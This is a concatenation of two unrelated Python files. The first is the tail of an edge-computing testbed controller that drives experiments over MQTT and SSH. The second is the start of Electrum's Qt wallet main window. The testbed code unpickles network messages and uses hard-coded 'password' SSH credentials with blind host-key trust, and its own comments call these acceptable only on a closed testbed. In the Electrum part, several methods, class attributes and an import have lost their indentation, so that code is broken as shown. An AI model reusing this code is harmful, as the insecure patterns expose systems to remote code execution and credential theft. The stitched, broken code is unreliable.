    def on_message(self, message_client, userdata, msg):
        # Payload is a pickled [hostname, ip] pair; only trusted testbed
        # nodes publish here (pickle on untrusted input would be unsafe).
        data = pickle.loads(msg.payload)  # [hostname, ip]
        print(msg.topic, data)
        self.finished.add(data[1])

    def publish(self, topic, data):
        self.client.publish(topic, data)

    def broker_loop(self):
        self.client.on_connect = self.on_connect
        self.client.on_message = self.on_message
        self.client.username_pw_set(self.user, self.pw)
        self.client.connect(self.ip, self.port, 60)
        self.client.loop_start()
        while True:
            if self.run == 0:
                self.client.loop_stop()
                self.client.disconnect()
                print('broker loop stopped!')
                break
            # Sleep to avoid the original hot busy-wait (100% CPU spin);
            # shutdown still happens within ~0.1s of run being cleared.
            time.sleep(0.1)

    def __del__(self):
        print('Broker Communication Object Deleted!')
def mec_id(client_ip):
    """Return the last octet of *client_ip* zero-padded to three characters.

    E.g. '192.168.122.9' -> '009', '192.168.122.19' -> '019',
    '192.168.122.119' -> '119'. Replaces the hand-rolled padding chain
    with str.zfill, which is equivalent for the 1-3 digit octets used here.
    """
    return client_ip.split('.')[-1].zfill(3)
"""
{'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117', 'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114', 'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111', 'osboxes-0': '192.168.122.110'}
"""
def send_command(host_, no_mec, algo_no, send_path):
    """SSH into MEC node *host_* and launch the selected algorithm script.

    NOTE(review): credentials are hard-coded and AutoAddPolicy blindly
    trusts unknown host keys -- acceptable only on this closed testbed.
    """
    try:
        c = paramiko.SSHClient()
        un = 'mec'
        pw = 'password'
        port = 22
        c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        c.connect(host_, port, un, pw)
        # Algorithm number -> remote script basename.
        algos = {1: 'algo_one', 2: 'algo_two', 3: 'algo_three', 4: 'algo_four', 5: 'algo_five', 6: 'algo_six'}
        # The controller host keeps its copy under a gui/ subdirectory.
        if host_ == mec_nodes['osboxes-0']:
            p = '/home/mec/deadlock_project/4algo/manual/gui'
        else:
            p = '/home/mec/deadlock_project/4algo/manual'
        cmd = f"python3 {p}/{algos[algo_no]}.py --n={no_mec} --p={send_path}"
        print(cmd)
        # Fire-and-forget: output channels of the remote command are not read.
        c.exec_command(cmd)
    except Exception as e:
        # Best-effort: a failed node is reported but does not abort the run.
        print(e)
def send_client(host_, no_mec, algo_no, send_path):
    """SSH into client node *host_* and start the load-generator script.

    NOTE(review): hard-coded credentials and AutoAddPolicy, same caveat
    as send_command -- closed-testbed use only.
    """
    try:
        c = paramiko.SSHClient()
        un = 'osboxes'
        pw = 'password'
        port = 22
        c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        c.connect(host_, port, un, pw)
        # --n=4 --a=1 --p=homo_1
        p = '/home/osboxes/deadlock_project/4algo/manual'
        cmd = f"python3 {p}/1client.py --n={no_mec} --a={algo_no} --p={send_path}"
        print(cmd)
        # Fire-and-forget, like send_command.
        c.exec_command(cmd)
    except Exception as e:
        print(e)
# python3 algo_three.py --n=10 --p=homo_4
def exp_control():
    """Drive the full experiment grid.

    For every (repetition, type, algorithm, cluster-size) combination:
    start the algorithm on the MEC nodes, start the client load
    generators, then poll until every node reports completion over MQTT.
    """
    # Published as a global so the __main__ KeyboardInterrupt handler can
    # stop the broker loop.
    global messenger
    broker_dict = {'user': 'mec', 'pw': 'password', 'sub_topic': 'control', 'ip': '192.168.122.111'}
    algos = [i for i in range(1, 7)]
    exp_no = [4, 7, 10]            # cluster sizes to test
    exp_type = ['homo', 'hetero']  # workload flavours
    client_ips = ['192.168.122.124', '192.168.122.125', '192.168.122.126']
    counter = range(5, 16)         # experiment repetition ids
    messenger = BrokerCom(**broker_dict)
    h1 = Thread(target=messenger.broker_loop)
    h1.start()
    input('start: ')
    # Sorted worker hostnames (controller excluded); sorting the dict
    # comprehension yields its keys.
    s_hosts = sorted({i: mec_nodes[i] for i in mec_nodes if i != 'osboxes-0'})
    for count in counter:
        for kind in exp_type:
            for algo_no in algos:
                for mec_no in exp_no:
                    # mec_no nodes total: (mec_no - 1) workers + controller.
                    hosts = {i: mec_nodes[i] for i in s_hosts[:mec_no - 1]}
                    hosts['osboxes-0'] = mec_nodes['osboxes-0']
                    # h_list = list(hosts)
                    send_path = f'{kind}_{count}'
                    print('initializing Edge nodes')
                    for hostname, ip in hosts.items():
                        print(hostname, ip)
                        send_command(host_=ip, no_mec=len(hosts), algo_no=algo_no, send_path=send_path)
                        #print(f'send_command(host_={ip}, no_mec={len(hosts)}, algo_no={algo_no}, send_path={send_path})')
                    # Give the edge nodes time to come up before load starts.
                    time.sleep(20)
                    print('initializing Client Nodes')
                    print('\n\n')
                    for ip in client_ips:
                        send_client(host_=ip, no_mec=len(hosts), algo_no=algo_no, send_path=send_path)
                        # print(
                        #     f'send_client(host_={ip}, no_mec={len(hosts)}, algo_no={algo_no}, send_path={send_path})')
                    # mec_no MEC hosts + 3 clients must all report done.
                    t_total = mec_no+3
                    print(f'Experiment {mec_no} for {kind} has commenced!')
                    while len(messenger.finished) != t_total:
                        time.sleep(60)
                    print('All is finished!')
                    messenger.finished = set()
                    # Cool-down between experiments.
                    time.sleep(3 * 60)
                    print(f'Experiment {mec_no} for {kind} is concluded!')
                    print('Waiting for 60 seconds Time Lapse!')
                    print('\n\n\n\n\n\n')
                    time.sleep(60)
    print('All Experiments has been Concluded!')
if __name__ == '__main__':
    os.system('clear')
    try:
        exp_control()
    except KeyboardInterrupt:
        print('killed')
        # `messenger` is only bound once exp_control() has started the
        # broker thread; guard against an interrupt before that point,
        # which previously raised NameError here.
        try:
            messenger.run = 0
        except NameError:
            pass
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
# Number of attempts made when sending a lightning payment before giving up
# (presumably retry-with-different-route; confirm against lnworker callers).
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
    # note: this class has a custom stylesheet applied in stylesheet_patcher.py
    """Small flat icon button used in the status bar.

    Wraps QToolButton so that the boolean "checked" argument PyQt5 passes
    with the clicked signal is dropped before invoking the supplied callback.
    """
    def __init__(self, icon, tooltip, func):
        QToolButton.__init__(self)
        self.setText('')
        self.setIcon(icon)
        self.setToolTip(tooltip)
        self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.setAutoRaise(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25,25))
        self.setCursor(QCursor(Qt.PointingHandCursor))
    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()
    def keyPressEvent(self, e):
        # Activate on Return/Enter like a regular button.
        if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
            self.func()
        else:
            # Fix: previously all other key events were silently swallowed,
            # breaking keyboard navigation (Tab/arrows/Esc). Forward them to
            # the default QToolButton handling.
            super().keyPressEvent(e)
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    # Local import keeps the module-level import block untouched.
    import functools

    # Fix: without functools.wraps the decorated method lost its __name__,
    # __doc__ and __qualname__, which hurts debugging and introspection.
    @functools.wraps(func)
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # Keep prompting until the password verifies or the user cancels.
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                self.show_error(str(e), parent=parent)
                continue
        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
    def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
        """Build the main wallet window: tabs, menus, shortcuts, status bar,
        and the network-callback plumbing for the given wallet."""
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        self.config = config = gui_object.config # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        assert wallet, "no wallet"
        self.wallet = wallet
        if wallet.has_lightning():
            self.wallet.config.set_key('show_channels_tab', True)
        self.setup_exception_hook()
        self.network = gui_object.daemon.network # type: Network
        self.fx = gui_object.daemon.fx # type: FxThread
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
        self.payto_URI = None
        self.checking_accounts = False
        self.qr_window = None
        self.pluginsdialog = None
        self.showing_cert_mismatch_error = False
        self.tl_windows = []
        self.pending_invoice = None
        Logger.__init__(self)
        # Incoming txs queued here are announced via the system tray,
        # rate-limited in notify_transactions().
        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0
        self.create_status_bar()
        self.need_update = threading.Event()
        self.completions = QStringListModel()
        coincontrol_sb = self.create_coincontrol_statusbar()
        # --- tabs: the first three are always shown, the rest are optional ---
        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        self.channels_tab = self.create_channels_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
        def add_optional_tab(tabs, tab, icon, description, name):
            # Record metadata on the tab widget itself so toggle_tab() can
            # later re-insert it at its nominal position.
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))
        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        central_widget = QWidget()
        vbox = QVBoxLayout(central_widget)
        vbox.setContentsMargins(0, 0, 0, 0)
        vbox.addWidget(tabs)
        vbox.addWidget(coincontrol_sb)
        self.setCentralWidget(central_widget)
        if self.config.get("is_maximized"):
            self.showMaximized()
        self.setWindowIcon(read_QIcon("electrum.png"))
        self.init_menubar()
        # Use a weak proxy in the shortcut lambdas below so they don't keep
        # the tab widget (and hence this window) alive after close.
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
        for i in range(wrtabs.count()):
            # i=i: bind the loop variable now (late-binding closure pitfall).
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.show_error_signal.connect(self.show_error)
        # NOTE(review): QWidget.setFocus() normally takes a Qt.FocusReason;
        # confirm passing True is intended here.
        self.history_list.setFocus(True)
        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status',
                         'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
                         'on_history', 'channel', 'channels_updated',
                         'payment_failed', 'payment_succeeded',
                         'invoice_status', 'request_status', 'ln_gossip_sync_progress',
                         'cert_mismatch', 'gossip_db_loaded']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            util.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
        # update fee slider in case we missed the callback
        #self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()
        # If the option hasn't been set yet
        if config.get('check_updates') is None:
            choice = self.question(title="Electrum - " + _("Enable update check"),
                                   msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                       _("Would you like to be notified when there is a newer version of Electrum available?"))
            config.set_key('check_updates', bool(choice), save=True)
        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
            def on_version_received(v):
                if UpdateCheck.is_newer(v):
                    self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                    self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                    self.update_check_button.show()
            self._update_check_thread = UpdateCheckThread()
            self._update_check_thread.checked.connect(on_version_received)
            self._update_check_thread.start()
    def setup_exception_hook(self):
        # Install the crash-reporter exception hook for this wallet/config.
        Exception_Hook.maybe_setup(config=self.config,
                                   wallet=self.wallet)
    def run_coroutine_from_thread(self, coro, on_result=None):
        """Schedule *coro* on the network's asyncio loop via the wallet's
        worker thread, blocking that worker until the coroutine completes.
        On success *on_result* (if given) is called with the result; errors
        are logged and surfaced on the GUI thread via show_error_signal."""
        def task():
            try:
                f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
                r = f.result()
                if on_result:
                    on_result(r)
            except Exception as e:
                self.logger.exception("exception in coro scheduled via window.wallet")
                self.show_error_signal.emit(str(e))
        self.wallet.thread.add(task)
    def on_fx_history(self):
        """Handle new historical exchange-rate data: refresh history and
        address views that display fiat values."""
        self.history_model.refresh('fx_history')
        self.address_list.update()
    def on_fx_quotes(self):
        """Handle a new spot exchange rate: refresh the status bar and
        re-trigger the fiat/BTC amount edits so they reconvert."""
        self.update_status()
        # Refresh edits with the new rate
        edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
        edit.textEdited.emit(edit.text())
        edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
        edit.textEdited.emit(edit.text())
        # History tab needs updating if it used spot
        if self.fx.history_used_spot:
            self.history_model.refresh('fx_quotes')
            self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
    def push_top_level_window(self, window):
        '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
        parented. This used to be done by explicitly providing the parent
        window, but that isn't something hardware wallet prompts know.'''
        self.tl_windows.append(window)
    def pop_top_level_window(self, window):
        # Counterpart of push_top_level_window(); raises ValueError if the
        # window was never pushed.
        self.tl_windows.remove(window)
    def top_level_window(self, test_func=None):
        '''Do the right thing in the presence of tx dialog windows'''
        # Most recently pushed window wins, unless test_func rejects it.
        override = self.tl_windows[-1] if self.tl_windows else None
        if override and test_func and not test_func(override):
            override = None  # only override if ok for test_func
        return self.top_level_window_recurse(override, test_func)
    def diagnostic_name(self):
        """Name used by Logger to tag this window's log lines."""
        #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
        return self.wallet.diagnostic_name()
    def is_hidden(self):
        # Minimized counts as hidden for tray show/hide purposes.
        return self.isMinimized() or self.isHidden()
    def show_or_hide(self):
        """Toggle window visibility (used by the system tray icon)."""
        if self.is_hidden():
            self.bring_to_top()
        else:
            self.hide()
    def bring_to_top(self):
        # show() restores a minimized window; raise_() puts it above siblings.
        self.show()
        self.raise_()
    def on_error(self, exc_info):
        """Display an exception from a background task to the user.
        *exc_info* is a (type, value, traceback) triple as from sys.exc_info().
        User cancellations are ignored; user-facing errors are shown verbatim;
        everything else is logged and shown via repr()."""
        e = exc_info[1]
        if isinstance(e, UserCancelled):
            pass
        elif isinstance(e, UserFacingException):
            self.show_error(str(e))
        else:
            # TODO would be nice if we just sent these to the crash reporter...
            # anything we don't want to send there, we should explicitly catch
            # send_exception_to_crash_reporter(e)
            try:
                self.logger.error("on_error", exc_info=exc_info)
            except OSError:
                pass  # see #4418
            self.show_error(repr(e))
    def on_network(self, event, *args):
        # Network callback entry point: may run on any thread, so forward the
        # event to the GUI thread via a queued Qt signal.
        self.network_signal.emit(event, args)
    def on_network_qt(self, event, args=None):
        """Dispatch a network event on the GUI thread.

        Events arrive for every wallet, so handlers that touch per-wallet
        state first check that args[0] is this window's wallet.
        """
        # Handle a network message in the GUI thread
        # note: all windows get events from all wallets!
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
                # Queued for the rate-limited tray notification.
                self.tx_notification_queue.put(tx)
        elif event == 'on_quotes':
            self.on_fx_quotes()
        elif event == 'on_history':
            self.on_fx_history()
        elif event == 'gossip_db_loaded':
            self.channels_list.gossip_db_loaded.emit(*args)
        elif event == 'channels_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_rows.emit(*args)
        elif event == 'channel':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_single_row.emit(*args)
                self.update_status()
        elif event == 'request_status':
            self.on_request_status(*args)
        elif event == 'invoice_status':
            self.on_invoice_status(*args)
        elif event == 'payment_succeeded':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_succeeded(*args)
        elif event == 'payment_failed':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_failed(*args)
        elif event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
        elif event == 'fee':
            pass
        elif event == 'fee_histogram':
            self.history_model.on_fee_histogram()
        elif event == 'ln_gossip_sync_progress':
            self.update_lightning_icon()
        elif event == 'cert_mismatch':
            self.show_cert_mismatch_error()
        else:
            self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
    def close_wallet(self):
        """Tear down wallet-specific state before the window closes."""
        if self.wallet:
            self.logger.info(f'close_wallet {self.wallet.storage.path}')
            self.wallet.thread = None
        run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet: Abstract_Wallet):
        """Attach *wallet* to this window and populate all views.
        Called once from __init__; the order of updates below matters
        (e.g. menus before visibility, geometry before show)."""
        wallet.thread = TaskThread(self, self.on_error)
        self.update_recently_visited(wallet.storage.path)
        if wallet.has_lightning():
            util.trigger_callback('channels_updated', wallet)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.channels_list.update()
        self.tabs.show()
        self.init_geometry()
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
    def warn_if_watching_only(self):
        """Show a one-off warning dialog if this wallet cannot spend."""
        if self.wallet.is_watching_only():
            msg = ' '.join([
                _("This wallet is watching-only."),
                _("This means you will not be able to spend Bitcoins with it."),
                _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
            ])
            self.show_warning(msg, title=_('Watch-only wallet'))
    def warn_if_testnet(self):
        """Warn once per process that the wallet is running on testnet,
        with a checkbox to permanently opt out of the warning."""
        if not constants.net.TESTNET:
            return
        # user might have opted out already
        if self.config.get('dont_show_testnet_warning', False):
            return
        # only show once per process lifecycle
        if getattr(self.gui_object, '_warned_testnet', False):
            return
        self.gui_object._warned_testnet = True
        msg = ''.join([
            _("You are in testnet mode."), ' ',
            _("Testnet coins are worthless."), '\n',
            _("Testnet is separate from the main Bitcoin network. It is used for testing.")
        ])
        cb = QCheckBox(_("Don't show this again."))
        cb_checked = False
        def on_cb(x):
            # Track the checkbox state; read back after the modal dialog.
            nonlocal cb_checked
            cb_checked = x == Qt.Checked
        cb.stateChanged.connect(on_cb)
        self.show_warning(msg, title=_('Testnet'), checkbox=cb)
        if cb_checked:
            self.config.set_key('dont_show_testnet_warning', True)
    def open_wallet(self):
        """Ask the user for a wallet file and open it in a new window."""
        try:
            wallet_folder = self.get_wallet_folder()
        except FileNotFoundError as e:
            self.show_error(str(e))
            return
        filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
        if not filename:
            return
        self.gui_object.new_window(filename)
    def select_backup_dir(self, b):
        """Let the user pick the backup directory and persist the choice.
        (*b* is the unused 'checked' argument from the clicked signal.)"""
        name = self.config.get('backup_dir', '')
        dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
        if dirname:
            self.config.set_key('backup_dir', dirname)
            self.backup_dir_e.setText(dirname)
    def backup_wallet(self):
        """Show a modal dialog to back up the wallet file to the configured
        backup directory, then perform the copy via wallet.save_backup()."""
        d = WindowModalDialog(self, _("File Backup"))
        vbox = QVBoxLayout(d)
        grid = QGridLayout()
        backup_help = ""
        backup_dir = self.config.get('backup_dir')
        backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
        msg = _('Please select a backup directory')
        if self.wallet.has_lightning() and self.wallet.lnworker.channels:
            # Backups cannot carry live channel state; warn the user.
            msg += '\n\n' + ' '.join([
                _("Note that lightning channels will be converted to channel backups."),
                _("You cannot use channel backups to perform lightning payments."),
                _("Channel backups can only be used to request your channels to be closed.")
            ])
        self.backup_dir_e = QPushButton(backup_dir)
        self.backup_dir_e.clicked.connect(self.select_backup_dir)
        grid.addWidget(backup_dir_label, 1, 0)
        grid.addWidget(self.backup_dir_e, 1, 1)
        vbox.addLayout(grid)
        vbox.addWidget(WWLabel(msg))
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            # User cancelled the dialog.
            return
        try:
            new_path = self.wallet.save_backup()
        except BaseException as reason:
            self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
            return
        if new_path:
            msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
            self.show_message(msg, title=_("Wallet backup created"))
        else:
            # save_backup() returns a falsy path when no backup_dir is set.
            self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
